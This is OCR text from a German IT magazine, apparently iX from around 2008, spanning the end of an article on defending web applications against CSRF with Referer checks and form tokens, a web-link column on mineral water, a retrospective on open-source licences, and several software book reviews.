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Einstellung originalOnly, die jedoch im 
Test nicht zuverlässig funktionierte. 
Was bei beiden Angeboten fehlt, ist ei- 
ne ausführliche Dokumentation, bei 
welchen Requests diese Einstellung ge- 
nau zum Tragen kommt. Des Weiteren 
sind solche Umsetzungen anfällig, da 
es sehr viele CSRF-Attacken gibt, die 
sie alle erkennen müssen. Die Möglich- 
keiten von Javascript erschweren diese 
Aufgabe zusätzlich. 

Zudem würde diese Einstellung ge- 
wünschte Effekte verhindern. Externe 
Seitenzähler, die viele Firmen anbie- 
ten, funktionierten nicht mehr richtig. 
Authentifizierungsmechanismen wie 
OpenID würden behindert, da hier ein 
Redirect auf den OpenID-Anbieter 
stattfindet, der kein Cookie mehr er- 
hielte. Ein Test mit Opera unter dieser 
Einstellung verhinderte das Einloggen 
mit OpenID bis die weiterleitende Do- 
main manuell freigegeben war. 

Diskussionen auch mit Webentwick- 
lern zeigen, dass zum einen bisher re- 
lativ wenig Wissen zu diesem Thema 
vorhanden ist und zum anderen oft 
nicht auf Anhieb der Unterschied zu 
XSS verstanden wird. Deshalb existie- 
ren viele unterschiedliche Meinungen 
darüber, wie sich Browser verhalten 
sollten. Solange es also keine verläss- 
liche Einstellung in allen Browsern 
gibt, muss man serverseitig ansetzen. 

Das Feld Referer im HTTP-Header 
scheint genau die gewünschte Funktion 
zu besitzen; es enthält im Normalfall 
die URL, von der der aktuelle Request 
ausging. Als Programmierer müsste 
man es nur prüfen und auf einige we- 
nige Ausnahmen achten. Beispiels- 
weise könnte eine Forums-Seite einen 
Artikel mit einem manipulierten Link 
und gleichzeitig das „echte“ Formular 
beinhalten, der Referer wäre also 
fälschlicherweise korrekt. Hier muss 
man bei allen Links, die aus Nutzer- 
eingaben stammen können, einen Zwi- 


schen-Redirect schalten. Auch manipu- 
lierbar ist der Referer in diesem Fall 
nicht, da sich der Browser unter Nut- 
zerkontrolle befindet. Fälschen lässt er 
sich nur, wenn man selbst etwa mit ei- 
nem Skript einen Request absetzt. 


Doppelt hält 


nicht immer besser 


Jedoch gibt es Proxies, die keinen oder 
veränderte Referer schicken; außerdem 
kann man bei den meisten Browsern die 
Übermittlung des Referer abschalten, um 
die Privatsphäre zu schützen. Würde er 
jedoch immer korrekt übertragen, wäre 
seine Prüfung die Lösung der Wahl. 

Die einfachste von einigen Forums- 
systemen eingesetzte Möglichkeit ist, 
die SID sowohl im Cookie wie in ei- 
nem versteckten Feld des Formulars 
abzulegen. Damit ist man auf der siche- 
ren Seite, und für viele kleine Anwen- 
dungen reicht das aus. Allerdings hat 
dieses Vorgehen zwei Nachteile. Zum 
einen steht die SID im Quelltext und ist 
somit leichter ausspähbar; etwa indem 
ein Nutzer eine solche Seite speichert 
und verschickt. Technischen Laien ist 
schwer zu vermitteln, warum das ge- 
fährlich sein kann. Zum anderen büßt 
man so den Komfort eines permanen- 
ten Cookie ein. Viele Seiten bieten 
über die SID hinaus ein solches Coo- 
kie, damit sie Kunden am eigenen PC 
immer automatisch erkennen. Kommen 
sie etwa nach zwei Stunden auf die Fo- 
rumsseite zurück, ist zwar die SID ab- 
gelaufen, aber dank des permanenten 
Cookie erstellt der Server automatisch 
eine neue. Ein noch geöffnetes Formu- 
lar enthält jedoch die alte SID, sodass 
der Server es nicht akzeptiert. An die- 
ser Stelle bräuchte man eine zwischen- 
geschaltete Bestätigungsseite. 

Um beiden Nachteilen zu entgehen, 
benötigt man eine zweite SID, zum 
Unterscheiden hier „Token“ genannt, 
das wesentlich länger gelten kann als 
die SID. Die Anwendung generiert ei- 
nes pro Nutzer und speichert es in der 
Datenbank. Alle Formulare enthalten 
seinen Wert in einem versteckten 
Feld. Der Angreifer kann somit kein 
gültiges Formular vorausfüllen, da er 
das Token nicht kennt. Mit dieser Än- 
derung schickt der Browser beim Ab- 
senden des Beispielformulars Folgen- 
des an www .forum.example/script: 


article=Lorem Ipsum 
submit_article=Abschicken 
action=post_article 


token=1234567890abcdef... 
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sowie die SID im Cookie. Versendet 
ein Nutzer so ein Formular per Mail, 
kann man zwar das Token auslesen, je- 
doch damit alleine nichts anfangen. Die 
SID ist unabhängig vom Token und ge- 
rät so nicht in fremde Hände. 

Das Token kann man genau wie eine 
klassische SID implementieren, sodass 
der Server das Ablaufdatum bei jedem 
Klick neu setzt; die einzigen Unter- 
schiede sind die längere Gültigkeits- 
dauer und der Übertragungsweg For- 
mular statt Cookie. Der Programmierer 
muss nur sicherstellen, dass es tatsäch- 
lich nach einer bestimmten Zeit abläuft, 
denn ein ewig gültiges Token wäre zu 
riskant. 

Bei diesem Verfahren besteht nur 
noch die Gefahr einer gezielten Atta- 


cke auf eine Person. Späht ein Angrei- 
fer auf irgendeinem Weg das Token 
aus, kann er genau diesen Nutzer auf 
eine manipulierte Seite locken. Um 
auch solche Angriffe zu verhindern, 
kann man Tokens implementieren, die 
jeweils einem Nutzer und einer Aktion 
zugeordnet sind. In der Datenbank 
stünde dann: 


user_id action token expire 
42 post_article 1234abed... 2008-04-17 
15:00:00 


Das Abschicken des Formulars löscht 
das Token sofort. Dieses Vorgehen er- 
fordert etwas mehr Programmierauf- 
wand, bietet aber größere Sicherheit, da 
ein Token nur noch für eine bestimmte 
Aktion gilt. 


[a] Cross-Site Request Forgery 
[b] Angriff auf Router 


de.wikipedia.org/wiki/CSRF 
www.heise.de/security/Praeparierte-Webseite-schaltet-Firewall-im- 


Router-aus-/news/meldung/101641 


[e] Angriff auf CMS 


www.heise.de/security/Sicherheitsluecken-in-WordPress-/news/ 
meldung/83280 


Fazit 


CSRF ist noch relativ unbekannt, und 
Angriffe sind passiv. Lücken auszunut- 
zen, erfordert gründliches Testen der 
Webanwendung oder genaue Kenntnis 
des Quellcodes. Jedoch können Angrei- 
fer Lücken ohne Bemerken des Nutzers 
ausnutzen, was je nach Anwendung zu 
unangenehmen Konsequenzen führt, 
wenn etwa empfindliche Daten oder 
Geld im Spiel sind. Browserseitig kön- 
nen sich bisher allenfalls erfahrene 
Nutzer etwas schützen, weshalb hier 
die Webentwickler in der Pflicht ste- 
hen, ihre Seiten beziehungsweise ihre 
Nutzer zu schützen. (ck) 


TINA MÜLLER 


arbeitet bei der int GmbH in Berlin 
und ist seit mehreren Jahren als 
Entwicklerin von Backends für Web- 
seiten tätig. Ihre Programmiersprache 


der Wahl ist Perl. 
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Internet-Infos 


Mineralwasser als Lebensspender 


Diane Sieger 


Ob Kaffee-, Cola- oder Weintrinker - 
eins haben sie gemeinsam: Ohne einen 
ordentlichen Schluck Leitungs- oder 
Mineralwasser täglich geht es nicht. 


er menschliche Körper besteht zu 
MD einem großen Teil aus Wasser; im 

Erwachsenenalter zu etwa 60 Pro- 
zent, bei Säuglingen beträgt der Anteil 
sogar bis zu 75 Prozent (www inform 
24.de/wasser.html). Da der Mensch un- 
unterbrochen Flüssigkeit über Atemluft, 
Harn oder Schweiß ausscheidet, muss 
eine ständige Versorgung von außen ge- 
währleistet sein. Am einfachsten geht 
das durch Trinken von Mineralwasser. 
Ein guter Grund, das Thema Wasser 
einmal genauer zu betrachten. 

Hierzulande ist es nicht sonderlich 
schwierig, an Informationen über Mine- 
ralwasser zu gelangen, denn Deutsch- 
land ist ein Mineralwasserland. Über 
500 Sorten in unterschiedlichen Zu- 
sammensetzungen gelangen von den 
deutschen Mineralbrunnen in den 
Handel - nachzulesen bei der Informa- 
tionszentrale Deutsches Mineralwasser 
(IDM) unter www.mineralwasser.com/ 
fakten/fakten/index.php. Laut IDM ist 
diese Vielfalt weltweit einzigartig, die 
Webseite „Mineral Waters of the 
World“ listet jedoch unter www.mine 
ralwaters.org für Italien noch einige 
Wässer mehr auf als für Deutschland. 
Auf dieser Non-Profit-Webseite finden 
sich über 3000 unterschiedliche Marken 
aus 125 Ländern, inklusive einer Auflis- 
tung ihrer Inhaltsstoffe und der Mög- 
lichkeit, Wassermarken zu bewerten. 
Ein Verbraucherportal rund ums Was- 
ser, dessen Design zwar ein wenig zu 
wünschen übrig lässt, das inhaltlich je- 
doch einen Blick wert ist. 

Wasser ist nicht gleich Wasser. In 
Deutschland wird zwischen Heil-, Mi- 
neral-, Quell-, Tafel- und Trinkwasser 
unterschieden. Die gesetzlich festgesetz- 
ten Definitionen regeln die zulässigen 
Verfahren für Gewinnung, Herstellung 
und Kennzeichnung sowie zulässige 
Inhaltsstoffe. Wer es genauer wissen 
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möchte, sollte sich die Seminararbeit 
von Daniela Heinrich (www.goek.tu- 
freiberg.de/oberseminar/OS_05_06/da 
niela_heinrich.pdf) aus dem Obersemi- 
nar Geoökologie aus dem Jahre 2006 zu 
diesem Thema durchlesen. Natürlich ist 
die offizielle Verordnung über natür- 
liches Mineral-, Quell- und Tafelwasser 
auch als Gesetzestext beim Bundesmi- 
nisterium der Justiz unter www .gesetze- 
im-internet.de/min_tafelwv abrufbar. 


Wasser ist 
kein Lebensmittel 


Erstaunlicherweise zählt in Flaschen 
verpacktes Wasser in Deutschland offi- 
ziell nicht als Lebensmittel. Zumindest 
steuerrechtlich muss der Verkäufer den 
19%igen Mehrwertsteuersatz aufschla- 
gen, nicht nur den sonst bei Lebensmit- 
teln üblichen 7%igen ermässigten Steu- 
ersatz. Einen Auszug aus der Liste der 
dem ermässigten Steuersatz unterliegen- 
den Gegenstände gibt es beim Shop- 
blogger (www.shopblogger.de/blog/ar 
chives/6183-19%25-auf-Wasser.htm]). 
Früher war die Beschaffung von 
Trinkwasser recht beschwerlich. Man 
musste mit Eimern zum nächstgelege- 
nen See oder Fluss pilgern und das küh- 
le Nass von dort nach Hause tragen 
(www .was-wir-essen.de/abisz/gewinnung 
_gesundes_trinkwasser.php) oder Was- 
serlöcher anlegen, aus denen mithilfe 
von Schildkrötenpanzern oder Birken- 
rinde das Wasser abgeschöpft werden 
konnte (de.wikipedia.org/wiki/Brunnen). 
Dagegen ist das Wassertrinken heute 
kinderleicht. Es gibt im Wesentlichen 
zwei Methoden. Erstens: den Wasser- 
hahn öffnen und das Wasser frisch in 
das Glas laufen lassen, gegebenenfalls 
filtern oder mit Kohlensäure versetzen. 
Zweitens: in den Supermarkt spazieren 


und die Wasserflasche der Wahl in den 
Einkaufswagen legen. 

Bleibt die Frage, woher das Wasser 
heute eigentlich kommt. Wie das kühle 
ass über das mehr als 400 000 Kilo- 
meter lange Wasserleitungssystem in 


Deutschland bis in den häuslichen Was- 
serhahn gelangt, erklärt der Westdeut- 


sche Rundfunk im Internetangebot zu 
seiner Sendung „Quarks & Co“ unter 
www .wdr.de/tv/quarks/sendungsbeitrae 
ge/2005/0712/04_wasser_zu_trinkwas 
ser.jsp. Den Weg vom Brunnen in die 
Flasche hingegen erläutert das in Ko- 
operation mit dem Bundesministerium 
für Ernährung, Landwirtschaft und Ver- 
braucherschutz entstandene Webange- 
bot von was-wir-essen.de anschaulich 
unter www .was-wir-essen.de/abisz/was 
ser_verarbeitung_aufbereitung.php. 


Die Mär vom 
Krieg der Flaschen 


Als der durchschnittliche iX-Leser noch 
ein Kind war, kam das Mineralwasser 
typischerweise in klassischer 0,7-Liter- 
Glasflasche mit vertrautem Perlendekor, 
an der man sich bei ersten Versuchen, 
das Aus-der-Flasche-Trinken zu erler- 
nen, fast die Zähne ausschlagen konnte. 
Heutzutage gewinnt die PET-Flasche zu- 
nehmend an Popularität. Die Vorteile der 
Plastikverpackung liegen klar auf der 
Hand: Durch das geringere Gewicht der 
Flaschen sind selbst Füllmengen von bis 
zu 1,5 oder 2 Litern für den Verbraucher 
noch einfach zu handhaben. Auch der 
durch Coca Cola in den frühen 90ern ge- 
prägte Begriff „unkaputtbar“ (de.wiktio 
nary.org/wiki/unkaputtbar) spiegelt einen 
enormen Vorteil der PET-Flasche wider: 
Sie ist nahezu unzerstörbar. Doch PET 
hat auch Gegner, die sich massiv gegen 
eine Ausbreitung der Plastikflasche weh- 
ren. Hauptkritikpunkt: Durch das gerin- 
ge Gewicht und günstig gestaltete Käs- 
ten brauchen die Brunnen weniger 
Lkw-Fuhren mit geringerem Benzinver- 
brauch, um das Wasser im Land zu ver- 
teilen. Dies zerstöre die mittelständische 
Erzeugerstruktur, da regionale Abfüllan- 
lagen weniger gebraucht würden. Detail- 
liert nachzulesen im Zeit-Artikel „Krieg 
der Flaschen“ unter www .zeit.de/ 
1995/13/Krieg_der_Flaschen?page=1. 

Doch nicht nur die Flasche steht im 
Fadenkreuz der Kritiker, oftmals gibt es 
um das Wasser direkt oder seine Her- 
stellungsmethoden einen Aufschrei. Bei- 
spielsweise als Hersteller Adelholzener 
für sein ActiveO2 Wasser im Jahre 2003 
auf Tierversuche setzte. Um die bis 
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dahin wenig erforschte und durchaus 
umstrittene Wirkung des mit Sauerstoff 
angereicherten Wassers zu belegen, 
führte Adelholzener Tests an Kaninchen 
durch und befand sich bald im Faden- 
kreuz einer groß angelegten Kampagne 
engagierter Tierschützer. Aufgrund des 
enormen Protestes stellte er die Tierver- 
suchsreihe glücklicherweise ein — nach- 
zulesen ist diese Erfolgsgeschichte beim 
Tierschutzbund unter www .tierschutz 
bund.de/00366.html. 

Bislang ging es hier vornehmlich um 
die positiven Aspekte des Trinkwasser- 
genusses. Allerdings ist der Genuss von 
Wasser nicht immer frei von Gefahren. 
Verbraucherschutzorganisationen schla- 
gen nach Mineralwassertests regelmä- 
Big Alarm. Ob Uran im kohlensäure- 
haltigen Wasser (www.youtube.com/ 
watch?v=t2Nhch79gxQ) oder Krank- 
heitskeime im stillen Wasser (www. 
youtube.com/watch?v=9Q_Wfth9Hsw 
&feature=related), für Menschen mit 
Abwehrschwächen kann durch den Ge- 
nuss verunreinigten Wassers sogar eine 
lebensbedrohliche Situation entstehen. 

Doch trotz regelmässiger Schre- 
ckensmeldungen: Wasser ist und bleibt 


eines der wichtigsten Grundnahrungs- 
mittel. Der Mensch kann zwar ohne Es- 
sen bis zu 30 Tage überleben, hält es 
ohne Wasseraufnahme aber nur zwei 
bis vier Tage aus (www .lifeline.de/spe 
cial/getraenke_trinken/mineralwasser/ 
content-128727.html). Deshalb sollte 
man die drohende Weltwasserkrise 
nicht aus den Augen verlieren. Bereits 
heute leben 1,1 Milliarden Menschen 


oma kennt 


ohne Zugriff auf sauberes Trinkwasser, 
und wenn man den Ausführungen des 
World Water Councils (worldwater 
council.org/index.php?id=25) folgt, las- 
sen sich weitere drastische Einschrän- 
kungen erwarten. Kein Wunder, ist doch 
ein Großteil des Weltwasservorkom- 
mens für die Ernährung von Menschen 
vollkommen ungeeignet (www.inta 
qua.de/wasserglobus). (ka) X 


Vor 10 Jahren: 


Lizenz zum Burgenbauen 


Auf den ersten Blick haben Programmierer und Juristen wenig 
gemeinsam. Doch bei näherem Hinsehen schlüpfen viele Softwareent- 
wickler auch immer wieder ganz gerne in den Talar des Advokaten mit 


mehr oder weniger weltanschaulichem Impetus. 


Das „Lizenzcenter‘‘ des Instituts für 
Rechtsfragen der Freien und Open 
Source Software führt etwa 200 ver- 
schiedene Lizenzen für quelloffene Soft- 
ware und ihre Dokumentationen auf. 
Eine iX zu diesem Thema könnte es 
locker auf eine Doppelnummer brin- 
gen. Matthias Kalle Dalheimer, vielen 
Lesern als Entwickler des grafischen 
Benutzerinterfaces KDE bekannt, macht 
dafür eine heimliche Leidenschaft ver- 
antwortlich, die Programmierer und 
Juristen gemeinsam haben: „So wie je- 
der Programmierer irgendwann im Le- 
ben einen eigenen Mail-Client schreibt, 
muss wohl jeder Open-Source-Advo- 
kat irgendwann seine eigene Lizenz 
schreiben.“ 

Vor 10 Jahren sah die Lizenzwelt 
kaum übersichtlicher aus, als iX in 
Ausgabe 6/98 mit mehreren Artikeln 
einen „Wegweiser im Lizenzdschun- 
gel“ aufstellte. Ausführlich wurde die 
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X11-Lizenzpolitik besprochen, kom- 
plett mit Stellungnahmen des konkur- 
rierenden XFree86 Project und der 
Open Group. Unter dem leicht frivo- 
len Titel „Sandkastenspiele‘“ bemühte 
sich Matthias Dalheimer, die wichtigs- 
ten Lizenzen der BSD-, GPL- und 
LGPL-Familien vorzustellen. Anders 
als es der Titel vielleicht suggeriert, 
behandelte Dalheimer die einzelnen 
Lizenzprojekte nicht als Kampf um 
das richtige Förmchen und die korrek- 
te Schaufel, sondern schilderte die je- 
weiligen Vorteile und Nachteile für 
konkrete Entwicklungsprojekte. 

Von einer journalistischen Darstel- 
lung abweichend, erklärte Dalheimer 
damals die Sicht des Entwicklers. „Im 
Gegensatz zu einigen Hardlinern bin 
ich nicht der Meinung, dass jede kom- 
merzielle Software ein Werk des Teu- 
fels ist. Beide haben ihre Berechtigung, 
und sei es nur, um den Entwicklern 


einen vollen Kühlschrank zu 
sichern. Als freischaffen- 
der Softwareentwick- 
ler spüre ich die 
Ambivalenz zwi- 
schen freien und 
kommerziellen Anwen- 
dungen täglich am eigenen 
Leibe — und zwar im positiven 
Sinne. Durch die Entwicklung kom- 
merzieller Applikationen kann ich mei- 
ne Familie ernähren und habe gleich- 
zeitig die Möglichkeit, freie Software 
zu schreiben.“ 

Von diesem entspannten Ansatz 
gegenüber den unterschiedlichen offe- 
nen wie kommerziellen Lizenzmodel- 
len ist Dalheimer auch nach 10 Jahren 
überzeugt. „Meine Haltung hat sich in 
der Angelegenheit nicht verändert, ich 
verwende grundsätzlich die für eine 
Aufgabe am besten geeignete Soft- 
ware, egal ob kommerziell oder nicht. 
In der Welt, in der ich mich bewege, 
ist freie Software aber oft überlegen 
oder die einzige Alternative.“ In sei- 
ner auf dreißig Mitarbeiter angewach- 
senen Firma hat Dalheimer zwar das 
Programmieren aufgegeben, nicht aber 
die Prinzipien. Aber einen Mail-Client 
könnte er noch schreiben und unter die 
erweiterte kleine Dalheimer-Lizenz 
stellen. Jederzeit. Detlef Borchers X 
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Buchmarkt 


gil heißt so viel wie beweg- 

lich, tätig, gut. Kein Wunder, 
dass der Begriff es in die Soft- 
wareentwicklung geschafft hat. 
Dass agile Programmierung nicht 
einfach Rumwuseln bedeutet, lehren Kent 
Beck und viele andere seit Jahren. Ob XP 
oder Scrum, agil zu programmieren will 
gelernt sein. Dies zu unterstützen, 
vor allem was 
XP angeht, ha- 
ben James Shore 
und Shane War- 
den „The Art of 
Agile Develop- 
ment“ geschrieben, 
das O’Reilly im vo- 
rigen Herbst veröf- 
fentlicht hat — anders 
als die Nutshell-Bän- 
de ohne Tier auf dem 
Cover; stattdessen zen- 
artiges Gewächs im 
Glas. Die Anspielung 
auf eine potenziell lange 
Lehrzeit unterstreicht das 
Serienmotto „Theory/in/ 
Practice“. 

Die Autoren führen zunächst ins The- 
ma ein, um anschließend die Eigenheiten 
des Extreme Programming darzustellen. 
Im dritten Teil schließlich beschäftigen 
sie sich damit, wie man XP an die eige- 
nen Bedürfnisse anpasst. Dass nicht ein- 
mal Agiles der Königsweg der Software- 
entwicklung sein kann — oder gar eine 
Wunderwaffe im Kampf gegen scheitern- 
de Projekte (Brooks’ „silver bullet“) -, 
heben Shore und Waren hervor. 

Beim ersten Blick auf Wolf-Gideon 
Bleeks und Henning Wolfs „Agile Soft- 
wareentwicklung“ liegt wegen der bunten 
Ballons der Gedanke an Smalltalk-80 na- 
he. Die beiden Autoren haben 
mit ihrem Band jedoch bei 


Leistungsfahigkeit von Web- 


Softwareentwicklung 


keit. Christof Schmalenbachs bei Springer 
in der Reihe Xpert.press erschienenes „Per- 
formancemanagement für service- 
orientierte Java-Anwendungen“ 
will hier helfen. Der Autor be- 
schreibt zunächst Rollen und 
Aufgaben von IT-Architekten, 
Entwicklern und anderen und 
diskutiert die Zusammenset- 
zung des Performanceteams. 
Anschließend geht es 
ch nn 

_\ um quantitative Me- 
thoden, später um 
Kapazitätsplanung 
und die Simulation 
von Geschäfts- 
prozessen. Nicht 
zu vergessen 
Java-Überwa- 
chung und die 


services. Administratoren, 
Projektverantwortliche wie 
Entwickler sollten sich an- 
gesprochen fühlen. 

Trotz Websprachen wie 
PHP dürfte das Entweder- 
oder in der Anwendungsprogrammie- 
rung, vor allem bei den sogenannten Rich 
Clients, ‚Net oder Java sein. Als Werk- 
zeuge kommen Visual Studio oder Eclipse 
infrage, was nichts gegen andere heißt. 

Berthold Daums Eclipse-Buch liegt 
mittlerweile in der dritten, überarbeiteten 
Auflage vor. „Rich-Client-Entwicklung 
mit Eclipse 3.3“, wiederum bei dpunkt 
erschienen, stellt dar, wie Programmierer 
die dafür notwendigen Plug-ins erzeugen 


können. Bei RCP kein Wunder: 
GUI-Fragen nehmen mit SWT 
und JFace einen großen Umfang 
ein. Darüber hinaus behandelt 
Daum Persistenzfragen (XML, 
RDBMS) und das Eclipsesche Graphical 
Editing Framework (GEF). Kein Buch 
für Einsteiger; Leser sollten etwas mit ge- 
nerischen Typen anfangen können. 

Auf der anderen Seite nennen Rainer 
Stropek und Karin Huber Rich Clients lie- 
ber Full Clients. Ihr „WPF und XAML 
Programmierhandbuch“, das die entwick- 
ler.press gerade veröffentlicht hat, behan- 
delt die Arbeit mit der Windows Presenta- 


tion Foundation und vor allem der „neuen“ 


XML Application Mark- 
up Language 
(XAML), die für 

WPF und die 

Windows Work- 

flow Foundation 
(WF) von Bedeu- 

tung ist. Ob Data 

Binding, 2D, An- 

imation oder 3D, 

Benutzerschnittstel- 
lenexperten der Win- 

dows-Forms-Ära ha- 

ben viel zu lesen. 

MW, Wer den Internet 

n 4 Explorer verstoßen und 
sich beispielsweise Fire- 
fox zugewandt hat, kann, 
entsprechende Fähigkeiten vorausgesetzt, 

Rich Clients mit Mozillas XML User 

Interface Language entwickeln. Jona- 

than Protzenkos XUL-Buch ist bei der 

Open Source Press in deutscher Überset- 

zung erschienen und zeigt, was man mit 

der Sprache anstellen kann: Durchgän- 

giges Projekt des Buches ist eine Foren- 

software. Nichts für IE-Fans, stattdessen 
für Mozilla-affine Entwickler 
gedacht. 


dpunkt soeben eine Einführung 
ins Agile veröffentlicht, die au- 
Ber XP Scrum und Feature Dri- 
ven Development (FDD) einbe- 
zieht. An den Komponenten 
Management, Team und Ent- 
wicklung orientiert, stellen sie 
Fragen, deren Beantwortung 
aus den unterschiedlichen Me- 
thoden stammen kann. 

Über verspätet ausgelieferte 
oder gescheiterte Projekte Kla- 
gen viele. Leistungseinbrüche 
im Betrieb sind zwar seltener 
Gegenstand der Diskussion, be- 
anspruchen aber insbesondere 
im Zeitalter netzweiter Software 
und serviceorientierter Architek- 
tur (SOA) mehr Aufmerksam- 
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Wolf-Gideon Bleek, Henning Wolf; Agile Softwareentwicklung; 
Werte, Konzepte, Methoden; Heidelberg (dpunkt] 2008; 187 Seiten; 
€ 29,- (Paperback) 


Berthold Daum; Rich-Client-Entwicklung mit Eclipse 3.3; 
Anwendungen entwickeln mit Eclipse RCP, SWT, Forms, GEF, BIRT, JPA 
u. a. m.; Heidelberg (dpunkt] 2008; 3., überarbeitete und erweiterte 
Auflage; 640 Seiten; € 49,- (gebunden) 


Chafic Kazoun, Joey Lott; Programmieren mit Flex 2; 

übersetzt von Sascha Kersken und Peter Klicman; Köln (O’Reilly) 2008; 
523 Seiten; € 54,90 [gebunden] 

Jonathan Protzenko; XUL; Entwicklung von Rich Clients mit der Mozilla 


XML User Interface Language; München (Open Source Press] 2007; 
übersetzt von Dinu Gherman; 351 Seiten; € 39,90 (gebunden) 


Christof Schmalenbach; Performance-Management; 

für serviceorientierte III ST HADUNGeN, Berlin, Heidelberg (Springer) 
2007; 267 Seiten; € 49,95 (Paperback) 

James Shore, Shane Warden; The Art of Agile Development; 
Sebastopol, CA [O’Reilly Media) 2007; 409 Seiten; € 38,- Paperback] 


Rainer Stropek, Karin Huber; WPF und XAML; 
Programmierhandbuch; Frankfurt/Main (entwickler.press) 2008; 
593 Seiten zzgl. CD-ROM; € 49,90 (gebunden) 


Wer Rich Client sagt, denkt 
wohl auch an Adobes Flash — 
beziehungsweise Flex oder 
AIR. O’Reilly hat Chafic Ka- 
zouns und Joey Lotts „Pro- 
grammieren mit Flex 2“ auf 
Deutsch veröffentlicht. Wie 
der Verlag mitteilt, lässt das 
Buch sich für die Arbeit mit 
der Version 3 ebenfalls nutzen. 
Die Autoren führen in MXML 
und Actionscript ein und wid- 
men sich Layoutcontainern, 
unterschiedlichen Medien, Da- 
tenkommunikation und Feh- 
lersuche. Weitere Bücher zu 
Flex 3 sollen im Sommer auf 
den Markt kommen. 

Henning Behme 
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Rezensionen 


ENTERPRISE 


JavaBeans 3 


DAS EJB3-PRAXISBUCH 
FÜR EIN- UND UMSTEIGER 


eine Programmiersprache 

weckt so lebendige Asso- 
ziationen mit Konzepten wie 
Wiederverwendbarkeit, Kom- 
ponentenarchitektur und Ap- 
plication Server wie Java. Java 
Beans sind wiederverwendba- 
re Komponenten, die auf der 
Client-Seite genutzt werden, 
während man mit dem EJB- 
Standard Komponenten auf 
der Server-Seite implemen- 
tiert. Dazu bedarf es eines Ap- 


Werner Eberling, Jan Leßner 


Enterprise 
JavaBeans 3 


München, Wien 2007 
Carl Hanser 

290 Seiten 

39,90 € 

ISBN 978-3-446-41085-5 


plication Server, der den Beans 
eine Reihe wichtiger Funktio- 
nen fertig anbietet. 

Werner Eberlings und Jan 
Leßners Buch hilft, auf die 
neue Version 3 des Standards 
zu migrieren. Wie andere 
Hanser-Bücher ist es praxis- 
orientiert, nach einer kurzen 
Einführung erklären die Au- 
toren die Grundbegriffe, die 
für das weitere Verständnis 
des Buches wichtig sind: 


Schichtenarchitektur, Kom- 
ponenten sowie das JDK und 
die Java Enterprise Edition. 
Schon im zweiten Kapitel 
wird eine Entwicklungsum- 
gebung installiert. 

Nach der erfolgreichen 
Implementierung der ersten 
Bean stellen die Autoren Ses- 
sions Beans vor. Dabei gehen 
sie wie in den folgenden Ka- 
piteln auf Unterschiede der 
Standards 2.0 und 3.0 ein. Im 
anschließenden Kapitel wid- 
men sie Entities mit 80 Sei- 
ten den Löwenanteil des Bu- 
ches. Hier lernt man alles 
über Persistenz, objektrela- 
tionales Mapping und Zugriff 
auf Objekte mittels Daten- 
bankabfragen. 

Nach einem Kapitel über 
Messaging (inklusive Java 
Messaging Service, JMS) 
gehen die Autoren genauer 
auf die Konfiguration einer 
EJB ein. Danach folgt ein 
Kapitel, das einen wichtigen 


Aspekt in der Programmie- 
rung von Anwendungen dar- 
stellt: Transaktionen. Persis- 
tenz, Container und per Bean 
verwaltete Transaktionen, 
Rollforward und Rollback 
werden hier genauer erklärt. 
Authentifizierung und Ver- 
schlüsselung stehen im Zen- 
trum des Kapitels über Si- 
cherheit. Es folgt eins, das 
Aspektorientierung in EJBs, 
Timed Objects und Object 
Handles als Alternative zu 
Remote References be- 
schreibt. Außerdem eins, das 
sich mit dem Testen von 
EJBs, Patterns und der Mi- 
gration zu EJB 3 beschäftigt. 
Wer sich in die Welt der 
EJBs einarbeiten will, ist mit 
diesem Buch gut bedient. Es 
bietet reichlich Code, der auf 
der Webseite zum Download 
zur Verfügung steht. Im Preis 
ist die elektronische Version 
des Buches inbegriffen. 
REINHARD VOGLMAIER 


ach E-Mail, FAQ, Instant 

Messaging und Open- 
Source-Software wandern nun 
Wiki-Systeme vom Internet 
ins Intranet großer wie kleiner 
Unternehmen. Im Gegensatz 
zu den im Enterprise gewohn- 
ten sperrigen „Knowledge Ma- 
nagement Systemen“ Kosten 
Wikis praktisch gar nichts, 
schaffen eine egalitäre, trans- 
parente Plattform für flache 
Hierarchien und sind enorm 
flexibel und praktisch. 

Die erste Frage, die sich 
vor der Einführung eines 
Wikis stellt: Welches Sys- 
tem verwenden? Hingegen 
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Anja Ebersbach, Markus 
Glaser, Richard Heigl, 
Alexander Warta 


Kooperation im Web 


Berlin, Heidelberg 2007 
Springer Verlag 

2., vollständig überarbeitete 
und erweiterte Auflage 

529 Seiten 

39,95 € 

ISBN 978-3-5403-5110-8 


ist die erste Frage, die sich 
immer stellen sollte: Kann 
die eigene Organisation so 
viel Transparenz und Ega- 
lität verkraften? 

Solche und andere Fragen 
erörtert „Wiki — Kooperation 
im Web“, in der ersten Auf- 
lage schon 2005 erschienen 
und Ende letzten Jahres völ- 
lig überarbeitet, von Springer 
veröffentlicht. Die vier Au- 
tor(inn)en sind Berater und 
haben ein Kompendium ge- 
schrieben, das den aktuellen 
Wissenstand zur Technik, 
Philosophie und Praxis von 
Wikis gut zusammenfasst. 


Das Buch vergleicht drei 
Systeme und beleuchtet de- 
ren Stärken, Schwächen, 
Merkmale, Installation und 
Betrieb, um zukünftigen Wi- 
ki-Mastern eine technische 
Grundlage für ihre Entschei- 
dung zu liefern. Die techni- 
schen Fragen sind im Betrieb 
aber nicht die allein wichti- 
gen, daher kommt die Erör- 
terung firmenpolitischer und 
sozialer Punkte ebenfalls 
nicht zu kurz. 

Wikis sind nützlich, erfor- 
dern aber flankierende orga- 
nisatorische und operative 
Maßnahmen; einfach nur ein 
System auf einem Server zu 
installieren ist zu wenig. Wi- 
kis als soziale Software ha- 
ben wegen ihres emanzipato- 
rischen Charakters durchaus 
subversive Aspekte. Dass 
nach der Einführung nie- 
mand etwas schreibt, gehört 
noch zu den harmloseren 
Pleiten, die passieren Können. 

Aus diesem Grund sehen 
viele die Wiki-Technik unter 
dem Blickwinkel möglicher 
Irritationen für Mitarbeiter 
und Vorgesetzte. Das Werk 


ist durchsetzt von einleuch- 
tenden (oft witzigen) Bei- 
spielen, Szenarien, Anekdo- 
ten und Motiven. 

Die Autoren liefern eine 
detaillierte Einführung zu 
drei Systemen: dem in PHP 
geschriebenen MediaWiki 
(Open Source, das System 
hinter Wikipedia), dem in 
Perl entwickelten TWiki 
(Open Source) sowie dem in 
Java geschriebenen Conflu- 
ence der australischen Firma 
Atlassian (inklusive kom- 
merzieller Lizenzen). 

Unter anderem erläutern 
die Autoren Fragen und 
Empfehlungen wie die titel- 
gebende Kollaboration im 
Wiki, Moderatoren für Pro- 
jekte und Teams, Konflikte, 
Vandalismus und mehr. Der 
